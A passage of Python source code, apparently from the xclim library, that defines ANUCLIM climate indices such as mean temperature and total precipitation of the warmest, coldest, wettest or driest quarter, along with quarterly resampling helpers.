If input units are in mm s-1 (or equivalent) values are converted to mm/day to avoid potentially small denominator
values.
"""
# If units in mm/sec convert to mm/days to avoid potentially small denominator
if units2pint(pr) == units("mm / s"):
pr = convert_units_to(pr, "mm d-1")
with xarray.set_options(keep_attrs=True):
seas = 100 * _anuclim_coeff_var(pr)
seas.attrs["units"] = "%"
return seas
@declare_units(tas="[temperature]")
def tg_mean_warmcold_quarter(
tas: xarray.DataArray,
op: str = None,
src_timestep: str = None,
freq: str = "YS",
) -> xarray.DataArray:
r"""ANUCLIM Mean temperature of warmest/coldest quarter.
The warmest (or coldest) quarter of the year is determined, and the mean temperature of this period is
calculated. If the input data frequency is daily ("D") or weekly ("W"), quarters are defined as 13 week periods,
otherwise as 3 months.
Parameters
----------
tas : xarray.DataArray
Mean temperature at daily, weekly, or monthly frequency.
op : str {'warmest', 'coldest'}
Operation to perform: 'warmest' calculate warmest quarter; 'coldest' calculate coldest quarter.
src_timestep : {'D', 'W', 'M'}
Input data time frequency - One of daily, weekly or monthly.
freq : str
Resampling frequency.
Returns
-------
xarray.DataArray, [same as tas]
Mean temperature values of the {op} quearter of each year.
Examples
--------
The following would compute for each grid cell of file `tas.day.nc` the annual temperature
warmest quarter mean temperature:
>>> import xclim.indices as xci
>>> t = xr.open_dataset(path_to_tas_file)
>>> t_warm_qrt = xci.tg_mean_warmcold_quarter(tas=t.tas, op='warmest', src_timestep='daily')
Notes
-----
According to the ANUCLIM user-guide https://fennerschool.anu.edu.au/files/anuclim61.pdf (ch. 6), input
values should be at a weekly (or monthly) frequency. However, the xclim.indices implementation here will calculate
the result with input data with daily frequency as well. As such weekly or monthly input values, if desired,
should be calculated prior to calling the function.
"""
out = _to_quarter(src_timestep, tas=tas)
oper = _np_ops[op]
out = select_resample_op(out, oper, freq)
out.attrs["units"] = tas.units
return out
@declare_units(tas="[temperature]", pr="[precipitation]")
def tg_mean_wetdry_quarter(
tas: xarray.DataArray,
pr: xarray.DataArray,
op: str = None,
src_timestep: str = None,
freq: str = "YS",
) -> xarray.DataArray:
r"""ANUCLIM Mean temperature of wettest/driest quarter.
The wettest (or driest) quarter of the year is determined, and the mean temperature of this period is calculated.
If the input data frequency is daily ("D") or weekly ("W"), quarters are defined as 13 week periods, otherwise are 3 months.
Parameters
----------
tas : xarray.DataArray
Mean temperature at daily, weekly, or monthly frequency.
pr : xarray.DataArray
Total precipitation rate at daily, weekly, or monthly frequency.
op : {'wettest', 'driest'}
Operation to perform: 'wettest' calculate for the wettest quarter; 'driest' calculate for the driest quarter.
src_timestep : {'D', 'W', 'M'}
Input data time frequency - One of daily, weekly or monthly.
freq : str
Resampling frequency.
Returns
-------
xarray.DataArray, [same as tas]
Mean temperature values of the {op} quarter of each year.
Notes
-----
According to the ANUCLIM user-guide https://fennerschool.anu.edu.au/files/anuclim61.pdf (ch. 6), input
values should be at a weekly (or monthly) frequency. However, the xclim.indices implementation here will calculate
the result with input data with daily frequency as well. As such weekly or monthly input values, if desired,
should be calculated prior to calling the function.
"""
tas_qrt = _to_quarter(src_timestep, tas=tas)
pr_qrt = _to_quarter(src_timestep, pr=pr)
xr_op = _xr_argops[op]
with xarray.set_options(keep_attrs=True):
out = _from_other_arg(criteria=pr_qrt, output=tas_qrt, op=xr_op, freq=freq)
out.attrs = tas.attrs
return out
@declare_units(pr="[precipitation]")
def prcptot_wetdry_quarter(
pr: xarray.DataArray, op: str = None, src_timestep: str = None, freq: str = "YS"
) -> xarray.DataArray:
r"""ANUCLIM Total precipitation of wettest/driest quarter.
The wettest (or driest) quarter of the year is determined, and the total precipitation of this
period is calculated. If the input data frequency is daily ("D") or weekly ("W") quarters
are defined as 13 week periods, otherwise are 3 months.
Parameters
----------
pr : xarray.DataArray
Total precipitation rate at daily, weekly, or monthly frequency.
op : {'wettest', 'driest'}
Operation to perform : 'wettest' calculate wettest quarter ; 'driest' calculate driest quarter.
src_timestep : {'D', 'W', 'M'}
Input data time frequency - One of daily, weekly or monthly.
freq : str
Resampling frequency.
Returns
-------
xarray.DataArray, [length]
Total precipitation values of the {op} quarter of each year.
Examples
--------
The following would compute for each grid cell of file `pr.day.nc` the annual wettest quarter total precipitation:
>>> from xclim.indices import prcptot_wetdry_quarter
>>> p = xr.open_dataset(path_to_pr_file)
>>> pr_warm_qrt = prcptot_wetdry_quarter(pr=p.pr, op='wettest', src_timestep='D')
Notes
-----
According to the ANUCLIM user-guide https://fennerschool.anu.edu.au/files/anuclim61.pdf (ch. 6), input
values should be at a weekly (or monthly) frequency. However, the xclim.indices implementation here will calculate
the result with input data with daily frequency as well. As such weekly or monthly input values, if desired,
should be calculated prior to calling the function.
"""
# returns mm values
pr_qrt = _to_quarter(src_timestep, pr=pr)
try:
oper = _np_ops[op]
except KeyError:
raise NotImplementedError(
f'Unknown operation "{op}" ; not one of "wettest" or "driest"'
)
out = select_resample_op(pr_qrt, oper, freq)
out.attrs["units"] = pr_qrt.units
return out
@declare_units(pr="[precipitation]", tas="[temperature]")
def prcptot_warmcold_quarter(
pr: xarray.DataArray,
tas: xarray.DataArray,
op: str = None,
src_timestep: str = None,
freq: str = "YS",
) -> xarray.DataArray:
r"""ANUCLIM Total precipitation of warmest/coldest quarter.
The warmest (or coldest) quarter of the year is determined, and the total
precipitation of this period is calculated. If the input data frequency is daily ("D) or weekly ("W"), quarters
are defined as 13 week periods, otherwise are 3 months.
Parameters
----------
pr : xarray.DataArray
Total precipitation rate at daily, weekly, or monthly frequency.
tas : xarray.DataArray
Mean temperature at daily, weekly, or monthly frequency.
op : {'warmest', 'coldest'}
Operation to perform: 'warmest' calculate for the warmest quarter ; 'coldest' calculate for the coldest quarter.
src_timestep : {'D', 'W', 'M'}
Input data time frequency - One of daily, weekly or monthly.
freq : str
Resampling frequency.
Returns
-------
xarray.DataArray : [mm]
Total precipitation values of the {op} quarter of each year
Notes
-----
According to the ANUCLIM user-guide https://fennerschool.anu.edu.au/files/anuclim61.pdf (ch. 6), input
values should be at a weekly (or monthly) frequency. However, the xclim.indices implementation here will calculate
the result with input data with daily frequency as well. As such weekly or monthly input values, if desired,
should be calculated prior to calling the function.
"""
# determine input data frequency
tas_qrt = _to_quarter(src_timestep, tas=tas)
# returns mm values
pr_qrt = _to_quarter(src_timestep, pr=pr)
xr_op = _xr_argops[op]
out = _from_other_arg(criteria=tas_qrt, output=pr_qrt, op=xr_op, freq=freq)
out.attrs = pr_qrt.attrs
return out
@declare_units(pr="[precipitation]")
def prcptot(
pr: xarray.DataArray, src_timestep: str = None, freq: str = "YS"
) -> xarray.DataArray:
r"""ANUCLIM Accumulated total precipitation.
Parameters
----------
pr : xarray.DataArray
Total precipitation flux [mm d-1], [mm week-1], [mm month-1] or similar.
src_timestep : {'D', 'W', 'M'}
Input data time frequency - One of daily, weekly or monthly.
freq : str
Resampling frequency.
Returns
-------
xarray.DataArray, [length]
Total precipitation.
Notes
-----
According to the ANUCLIM user-guide https://fennerschool.anu.edu.au/files/anuclim61.pdf (ch. 6), input
values should be at a weekly (or monthly) frequency. However, the xclim.indices implementation here will calculate
the result with input data with daily frequency as well.
"""
pram = rate2amount(pr)
return pram.resample(time=freq).sum(dim="time", keep_attrs=True)
# FIXME: src_timestep is not used here.
@declare_units(pr="[precipitation]")
def prcptot_wetdry_period(
pr: xarray.DataArray, *, op: str, src_timestep: str, freq: str = "YS"
) -> xarray.DataArray:
r"""ANUCLIM precipitation of the wettest/driest day, week, or month, depending on the time step.
Parameters
----------
pr : xarray.DataArray
Total precipitation flux [mm d-1], [mm week-1], [mm month-1] or similar.
op : {'wettest', 'driest'}
Operation to perform : 'wettest' calculate wettest period ; 'driest' calculate driest period.
src_timestep : {'D', 'W', 'M'}
Input data time frequency - One of daily, weekly or monthly.
freq : str
Resampling frequency.
Returns
-------
xarray.DataArray, [length]
Total precipitation of the {op} period.
Notes
-----
According to the ANUCLIM user-guide https://fennerschool.anu.edu.au/files/anuclim61.pdf (ch. 6), input
values should be at a weekly (or monthly) frequency. However, the xclim.indices implementation here will calculate
the result with input data with daily frequency as well. As such weekly or monthly input values, if desired,
should be calculated prior to calling the function.
"""
pram = rate2amount(pr)
if op == "wettest":
return pram.resample(time=freq).max(dim="time", keep_attrs=True)
if op == "driest":
return pram.resample(time=freq).min(dim="time", keep_attrs=True)
raise NotImplementedError(
f'Unknown operation "{op}" ; op parameter but be one of "wettest" or "driest"'
)
def _anuclim_coeff_var(arr: xarray.DataArray) -> xarray.DataArray:
"""Calculate the annual coefficient of variation for ANUCLIM indices."""
std = arr.resample(time="YS").std(dim="time")
mu = arr.resample(time="YS").mean(dim="time")
return std / mu
def _from_other_arg(
criteria: xarray.DataArray, output: xarray.DataArray, op, freq: str
) -> xarray.DataArray:
"""Pick values from output based on operation returning an index from criteria.
Parameters
----------
criteria : DataArray
Series on which operation returning index is applied.
output : DataArray
Series to be indexed.
op : func
Function returning an index, for example np.argmin, np.argmax, np.nanargmin, np.nanargmax.
freq : str
Temporal grouping.
Returns
-------
DataArray
Output values where criteria is met at the given frequency.
"""
ds = xarray.Dataset(data_vars={"criteria": criteria, "output": output})
dim = "time"
def get_other_op(dataset):
all_nans = dataset.criteria.isnull().all(dim=dim)
index = op(dataset.criteria.where(~all_nans, 0), dim=dim)
return lazy_indexing(dataset.output, index=index, dim=dim).where(~all_nans)
return ds.resample(time=freq).map(get_other_op)
def _to_quarter(
freq: str,
pr: Optional[xarray.DataArray] = None,
tas: Optional[xarray.DataArray] = None,
) -> xarray.DataArray:
"""Convert daily, weekly or monthly time series to quarterly time series according to ANUCLIM specifications."""
if freq.upper().startswith("D"):
if tas is not None:
tas = tg_mean(tas, freq="7D")
if pr is not None:
# Accumulate on a week
# Ensure units are back to a "rate" for rate2amount below
pr = convert_units_to(precip_accumulation(pr, freq="7D"), "mm")
pr.attrs["units"] = "mm/week"
freq = "W"
if freq.upper().startswith("W"):
window = 13
elif freq.upper().startswith("M"):
window = 3
else:
raise NotImplementedError(
f'Unknown input time frequency "{freq}": must be one of "D", "W" or "M".'
)
if tas is not None:
tas = ensure_chunk_size(tas, time=np.ceil(window / 2))
if pr is not None:
pr = ensure_chunk_size(pr, time=np.ceil(window / 2))
if pr is not None:
pram = rate2amount(pr)
out = pram.rolling(time=window, center=False).sum()
out.attrs = pr.attrs
out.attrs["units"] = pram.units
if tas is not None:
out = tas.rolling(time=window, center=False).mean(skipna=False)
out.attrs = tas.attrs
out = ensure_chunk_size(out, time=-1)
return out
| 2.4375 | 2 |
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.